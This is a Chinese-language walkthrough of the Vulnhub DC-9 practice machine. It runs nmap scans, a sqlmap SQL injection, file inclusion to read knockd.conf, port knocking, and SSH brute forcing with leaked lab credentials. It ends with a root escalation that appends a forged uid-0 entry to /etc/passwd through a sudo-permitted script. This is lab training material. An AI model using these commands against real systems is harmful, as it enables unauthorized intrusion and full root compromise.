Vulnhub靶机DC系列-DC-9
靶场环境
靶场名称:DC-9
靶场地址:https://www.vulnhub.com/entry/dc-9,412/
下载地址:
DC-9.zip (Size: 700 MB)
Download: http://www.five86.com/downloads/DC-9.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-9.zip.torrent(Magnet)
VMware->文件->打开->选中 .ova 文件,导入,会提示导入失败,点重试就完事了(双击.ova好像就直接导入了-_-)
打开DC靶机(网络适配器看一下是不是NAT模式,不然扫不出来)
DC系列最后一台靶机
信息收集
kali攻击机网段:192.168.210.0/24
nmap 扫一下DC-9靶机的网段
namp -sn x.x.x.x/x
- 靶机DC-9 IP:192.168.210.148
- kali:192.168.210.137
nmap扫描一下靶机的端口信息、系统信息等等。
nmap -O -sV -p- 192.168.210.148
22端口不是open
访问页面
扫描目录
获得权限
页面有一个查询,URL没有数据判断是个POST请求,bp抓包
存在SQL注入,sqlmap跑一下
sqlmap -u "http://192.168.210.148/results.php" --data="search=1" --batch --dbs
依次查库、查表、查列,最后两个库得到:
第一想法就是md5
- admin
- transorbital1
看到这个‘file does not exits’,疑似文件包含
最终通过爆破发现knockd.conf,看一下/etc/knockd.conf文件中的自定义端口
有3个自定义端口7469,8475,9842,根据Port-knocking的规则依次访问这三个端口就可以打开SSH服务了
nmap -p 7469 192.168.210.148
nmap -p 8475 192.168.210.148
nmap -p 9842 192.168.210.148
将前面所爆出来的那些员工的账号和密码编写成两个字典,进行ssh爆破
爆破出来有2个用户可用,chandlerb\UrAG0D!、joeyt\Passw0rd
什么都没改再跑了一次,又出了一个,玄学
janitor\Ilovepeepee
依次ssh连接,在janitor家目录下找到另一个密码字典
再次爆破
ssh连接
- fredf/B4-Tru3-001
可提权
尝试执行发现是python文件
使用find查找test.py文件
find / -name test.py 2>/dev/null
查看文件
cat /usr/lib/python3/dist-packages/setuptools/command/test.py
cat /opt/devstuff/test.py
看else后面,./test命令有两参数,文件1,文件2
文件1以‘r’打开,读取内容到output,文件2以’a’,append打开
把output追加到文件2
构造passwd的参数
openssl passwd -1 -salt admin 123456
openssl是一个安全套接字层密码库,囊括主要的密码算法、常用密钥、证书封装管理功能及实现ssl协议
-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密
admin 123456 用户名和密码
$1$admin$LClYcRe.ee8dQwgrFc5nz.
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
# 用户名:密码:uid:gid:家目录:登陆后使用的shell
sudo ./test /tmp/passwd /etc/passwd